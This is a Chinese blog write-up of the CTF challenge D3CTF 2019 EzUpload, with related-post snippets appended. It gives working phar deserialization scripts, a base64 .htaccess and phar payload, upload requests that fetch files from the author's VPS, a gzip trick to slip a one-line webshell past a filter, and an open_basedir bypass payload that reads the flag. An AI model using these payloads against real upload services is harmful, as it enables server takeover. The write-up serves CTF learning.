buu刷题记录 [D3CTF 2019]EzUpload

已于 2022-04-09 22:04:24 修改
阅读量2k 收藏 3
点赞数 3
文章标签: web安全 php
于 2022-04-08 23:16:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51458899/article/details/124053297
版权

[D3CTF 2019]EzUpload

参考[D3CTF 2019]EzUpload(phar反序列化/.htaccess+phar关键字绕过) | (guokeya.github.io)

参考[D3CTF 2019]EzUpload - 简书 (jianshu.com)

参考2019 D3CTF ezupload题解_slug01sh的博客-CSDN博客

代码审计,很快发现htaccess,phar没有过滤,试图挖链子发现可以!

  • phar

链子并转为phar

<?php
    class dir{
    public $userdir;
    public $url;
    public $filename;
    }
 
   $phar = new Phar("phar.phar"); //后缀名必须为phar
   $phar->startBuffering();
   $phar->setStub(" __HALT_COMPILER(); "); //设置stub
   $o = new dir();
   $a = new dir();
   $a->userdir='../';
   $o->userdir=$a;
   $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>

image-20220408204851376

记住文件名upload/cc551ab005b2e60fbdc88de809b2c4b1

  • htaccess

试图远程传输

action=upload&filename=.htaccess&url=http://8.129.42.140:3307/.htaccess

但是失败了

image-20220408224101885

由于可以使用data协议,所以我们可以把

[root@iZwz9ck0io750jjxfvvlkqZ test]# cat .htaccess | base64
QWRkSGFuZGxlciBwaHA3LXNjcmlwdCAudHh0Cgo=

然后用data协议进行文件包含

action=upload&filename=.htaccess&url=data:image/png;base64,QWRkSGFuZGxlciBwaHA3LXNjcmlwdCAudHh0

当然,考虑到没有禁用data协议,phar也可以直接 (但是我没有这么做)

action=upload&filename=phar.txt&url=data:image/png;base64,IF9fSEFMVF9DT01QSUxFUigpOyA/Pg0KLQEAAAEAAAARAAAAAQAAAAAA9wAAAE86MzoiZGlyIjozOntzOjc6InVzZXJkaXIiO086MzoiZGlyIjozOntzOjc6InVzZXJkaXIiO3M6NDA6InVwbG9hZC80OGNkOGI0MzA4MTg5NmZiZDA5MzFkMjA0Zjk0NzY2My8iO3M6MzoidXJsIjtOO3M6ODoiZmlsZW5hbWUiO047fXM6MzoidXJsIjtOO3M6ODoiZmlsZW5hbWUiO3M6Nzk6Ii92YXIvd3d3L2h0bWwvZmViZWZlMWNjNWM4Nzc0OC91cGxvYWQvNDhjZDhiNDMwODE4OTZmYmQwOTMxZDIwNGY5NDc2NjMvd2Vic2hlbGwiO30IAAAAdGVzdC50eHQEAAAARPrEXgQAAAAMfn/YtgEAAAAAAAB0ZXN0hhX3PmvSpwnvsS1rmPywO8MrIPgCAAAAR0JNQg==

我的做法是传到vps上面进行远程文件包含(python3 -m http.server 3307

先上传我们的phar文件(命名位1.jpg)

action=upload&filename=1.jpg&url=http://8.129.42.140:3307/1.jpg

再触发反序列化,查看绝对路径,为后面写马铺垫(为什么会预料到绝对路径不是/var/ww/html/upload,因为原题是有提示的),payload:

action=upload&filename=&url=phar://upload/cc551ab005b2e60fbdc88de809b2c4b1/1.jpg

image-20220408213908681

由此得到了/var/www/html/和/upload/之间的路径

image-20220409215632108

phar (组合起来得到下面的绝对路径,以你自己读到的为准)

<?php
class dir{
    public $userdir;
    public $url;
    public $filename;
}
$a=new dir();
$a->filename='/var/www/html/4bac3882938ce191/upload/cc551ab005b2e60fbdc88de809b2c4b1/test';
$a->userdir='一句话木马';
@unlink("phar.phar");
$phar=new Phar("phar.phar");
$phar->startBuffering(); 
$phar->setStub('GIF89a'."__HALT_COMPILER();"); 
$phar->setMetadata($a); 
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

上传

action=upload&filename=2.jpg&url=http://8.129.42.140:3307/2.jpg

触发phar反序列化

action=upload&filename=&url=phar://upload/cc551ab005b2e60fbdc88de809b2c4b1/2.jpg

但是我上传后马上被ban,仔细思考了一下,原来是<?

image-20220408212236317

然后这里运用的是phar协议能够解压zip,gzip等等压缩包的性质,于是gzip压缩一下,gzip phar.phar(据说zip压缩会寄)

之后再上传,触发序列化,然后访问{md5}/test.txt就可以看到明文写着的一句话木马(看上去是txt,但事实上有了htaccess已经可以解析了)

然后需要绕过openbasedir,直接给payload

1=ini_set('open_basedir'%2C%20'..')%3Bchdir('..')%3Bchdir('..')%3Bchdir('..')%3Bchdir('..')%3Bchdir('..')%3Bchdir('..')%3Bini_set('open_basedir'%2C%20'%2F')%3Bvar_dump(file_get_contents('%2FF1aG_1s_H4r4'))%3B

image-20220408230015611

由于此题每十分钟刷新一次目录(还有文件也会被删除),所以要拼手速。也可以用脚本2019 D3CTF ezupload题解_slug01sh的博客-CSDN博客

也有另一种做法,就是源码中__destruct有把文件名写入txt的操作,所以文件名可以直接是一句话木马(win下不支持这种操作,所以需要linux),这种思路类似于2020的国赛web

ththaiai
关注
Baby XSS
qq_39536716的博客
05-01 2213
对于XSS的学习过程,已经更新在CSDN博客 题目分析 这道题目告诉我们flag在admin.php中,只有admin才能获取它,我们点击进去之后发现并没有flag,这是为什么呢?因为我们不是admin,因此,我们必须伪装成admin。 题目的下面有一行代码,substr((md5(‘proof of work’),0,6) === ‘4b3392’) 这一行代码的意思是截取经过MD5编码的工作量...
[2019EIS高校运维赛]ezupload
xlcvv的博客
04-17 3210
ezupload ezbypass 一、ezupload 先来一个之前的思路 随意输入username和oassword: 又试了一下万能密码,也是login failed,那就想到了sql注入,抓包另存为txt文件: 用username做注入点,失败。看了大佬的wp后才知道,网页源码下有个小提示: 下载下来,是个swp文件: swp文件是文件在编辑的过程中,由于不正当结束,会存在修...
[D3CTF 2019]EzUpload 84
shinygod的博客
03-30 731
知识点:phar反序列化,.htaccess phar反序列化 这篇讲的非常细:[https://www.cnblogs.com/zzjdbk/p/13030571.html] 原理 phar://可以解析一个phar的php打包程序,且phar打包程序里有我们的shell。 那么phar打包文件怎么生成呢? 只要访问页面,就可以通过下面这个来生成一个.phar。 <?php #要把php.ini中的phar.readonly设置成Off,不然无法生成phar文件 class TestObj
2019 D3CTF ezupload题解
读万卷书,行万里路。
08-15 1591
0 前言 一个 PHP 反序列化的题目。虽然序列化的的利用链简单,但是还是踩了很多坑。 1 题解 序列化脚本:serialize.php <?php class dir{ public $userdir; public $url; public $filename; } $o = new dir(); $tmp = new dir(); $tmp->userdir = $argv[1]; // 需要扫描的目 $o->userdir = $tmp; $o-
[D3CTF 2019]EzUpload gzip压缩phar .htaccess内容正则绕过 glob://爆破目 绕过open_basedir
a3320315的博客
02-21 1703
源码 <?php class dir{ public $userdir; public $url; public $filename; public function __construct($url,$filename) { $this->userdir = "upload/" . md5($_SERVER["HTTP_X_REAL_I...
【PolarCTFezupload
m0_73818758的博客
09-24 702
将Content-Disposition: form-data;得到flag为:flag{ffffffffllllaaggg_!
BUU题记
Sapphire037的博客
08-24 373
[FBCTF2019]RCEService 不会做,看了wp不知道哪来的源码,用json格式传,知识点就是绕过preg_match的方法,回溯,数组(这题没用),换行符%0A [Zer0pts2020]Can you guess it? 进入页面得到源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
BUU题记(三)
山高路远
04-10 3135
buu——pwn学习 十、铁人三项(第五赛区)_2018_rop checksec一下,开启了nx保护,然后拖入ida 呃。。。应该就是比较熟悉的rop的构建了,直接上exp吧,这类题目做挺多的了: 十一、gyctf_2020_borrowstack 先做下这题,一直想完整的了解栈迁移,借着这题真正的掌握栈迁移的手法和知识点吧,先checksec一下,再拖入ida分析 里面很简单,没有什么复杂的函数,很适合借此了解栈迁移!首先read函数读取的字节数不够,只能够刚好覆盖返回地址。第二输入点的位置是b
buu题 [SUCTF2019]SignIn1
m0_56194555的博客
01-10 556
buu题 [SUCTF2019]SignIn1 冲冲冲!!!
buu [GUET-CTF2019]BabyRSA
ao52426055的博客
12-01 1480
查看题目 观察题目给的条件,给了p+q,(p+1)(q+1),e,d,以及密文C. RSA的解密公式:M=C^d mod n 所以我们只要求出n即可。(n = pq) n = (p+1)(q+1) - (p+q) - 1 求M的值,已知C,d,n后 用函数pow(),即可求出 import libnum a = 0x1232fecb92adead91613e7d9ae5e36fe6bb765317d6ed38ad890b4073539a6231a6620584cea5730b5af83a3e80cf30
XSS攻击检测
01-22
XSS攻击检测代码,删除bin生成的class,直接使用src加载.java 就好了,开发采用的myeclipse,使用其他工具的注意修改,
BUU题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
[UUCTF 2022 新生赛]ez_upload
weixin_67565639的博客
12-23 1555
a. .user.ini是php的一种配置文件,众所周知php.ini是php的配置文件,它可以做到显示报错,导入扩展,文件解析,web站点路径等等设置自 PHP 5.3.0 起,PHP 支持基于每个目的 .htaccess 风格的 INI 文件。手册中的每个指令都有其所属的模式。大致原理就是上传一个配置文件,配置文件中的意思就是让每一个php文件都包含一个你指定的文件(可以是任意后缀),被包含的文件都会用PHP执行。a.可以上传 ini文件,且上传之后文件不被修改,必须为 .user.ini文件名。
ctf练习之Easy upload
SDM_JH的博客
08-07 2876
一、进入目标站点,查看网页源码,发现上传后缀白名单。 二、先上传一个.png的图片看看,得到提示。 三、打开burp suite,设置代理。修改上传的文件名,绕过前端限制,得到新的提示。 四、在图片内容的中间位置插入内容,得到flag ...
[SWPUCTF 2022 新生赛]Ez_upload 详细题解
最新发布
weixin_73904941的博客
12-04 976
html目没有flag文件,根目有一个flag文件,但是里面没有flag 一般flag文件都会放在根目下,或者当前目,又或者藏在phpinfo()页面和环境变量中 在蚁剑中就可以查看环境变量,鼠标右键打开虚拟终端,在bash中输入env即可查看得到flag
d3ctf_2019_ezfile(文件流fileno的巧妙利用)
seaaseesa的博客
06-11 1114
d3ctf_2019_ezfile(文件流fileno的巧妙利用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能存在UAF 程序里使用的是write输出,因此劫持IO_2_1_stdout泄露不了数据。 Add功能的size固定 Encrypt功能存在栈溢出 程序一开头有一个这个 我们可以利用堆漏洞劫持IO_2_1_stdin,将里面的fileno改为3,然后利用encrypt功能里的栈溢出,采用低字节覆盖法,将返回地址覆盖到此处 .
i春秋 web 简单的招聘系统(sql注入)、ezupload(upload)
H4ppyD0g的博客
02-29 853
简单的招聘系统(sql注入) 登界面可以使用万能密码登1' or 1=1;# 然后再search for key模块进行盲注(我不会。。。) 看wp,有的人是直接在登界面进行sql盲注 1' or (ascii(substr((select(group_concat(flaaag))from(flag)),1,1))=102)#就可以登成功,因为or 1时,1就是真值,所以前面不管or什么...
D^3CTF babyrop 经验总结
qq_43189757的博客
11-29 669
思路: 调试时发现在栈中有一个libc_start_main的地址 可以根据这个地址算出距one_gadget 的偏移 得到这个偏移后再让libc_start_main这个地址加上这个偏移即可得到one_gaget的地址, 之后再用这个地址覆盖ret即可getshell, 需要注意的是要满足one_gadget的约束条件, 我选则的是偏移为0x4526a 处的one_gadget, 所以需要保...
ctf题目
qq_46132256的博客
09-04 466
高不够时先查看图片属性长宽转为16进制,再使用010editor等二进制查看图片长宽的十六进制并修改。
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵,用户数据泄露等安全问题。在比赛中,参赛者需要学习ssti的原理和常见的攻击方法,并利用它来获取目标系统的flag。在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值